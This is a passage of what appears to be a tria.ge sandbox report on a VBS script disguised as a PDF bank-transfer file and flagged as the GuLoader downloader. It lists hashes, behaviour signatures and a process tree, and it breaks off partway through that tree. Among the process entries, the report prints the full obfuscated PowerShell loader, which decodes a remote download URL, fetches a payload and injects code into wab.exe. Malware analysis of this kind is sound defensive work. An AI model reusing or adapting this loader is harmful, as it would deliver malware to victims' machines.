Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

pko_trans_...df.vbs

windows7-x64

10

pko_trans_...df.vbs

windows10-2004-x64

10

Resubmissions

13/09/2024, 07:40

240913-jhhq3a1hjq 8

13/09/2024, 07:26

240913-h9trza1ekr 8

09/09/2024, 06:56

240909-hqwgfsyeka 10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    09/09/2024, 06:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    pko_trans_details_20240909_105339·pdf.vbs

  • Size

    34KB

  • MD5

    f47be72a96dd07190c9636231654dfe5

  • SHA1

    b0f23fa8a4669111d04e442e81888330f76b5689

  • SHA256

    8317fc4b7eb8d40478a79de9fc539469ab5b2904822894ac6eee27f7cf9e6ce9

  • SHA512

    a739b342622f6949f3238b18b8c51ecbddfa61ddd6d2b18b83bff9f9b72a9c9774aca871f547ace1d41a123d756e3498babd6eb42d9b4e42f3c32e2ec91bdc56

  • SSDEEP

    192:oM+q8B50G4urQDIN9+H27uci5akloQROGHb0m1f8uk2R6Ct9gpCIHOmJTmFLauQ:l8Lv4urQ89mAu9YzafAGk2RnyYBPTQ

Score
10/10
guloaderdiscoverydownloaderexecution

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 59 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 61 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240909_105339·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
        3⤵
          PID:2884
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2504
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2188
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1020
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2420
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2256
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3004
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1748
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2472
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1248
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1700
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2560
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1464
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1272
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1648
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2448
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2360
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2872
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2504
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2240
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1892
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1948
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1556
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2860
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1768
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2296
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:852
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2084
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2356
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2396
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2008
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1628
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2556
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2144
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1776
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:456
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2304
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2768
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2776
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2792
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1124
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:640
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:340
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
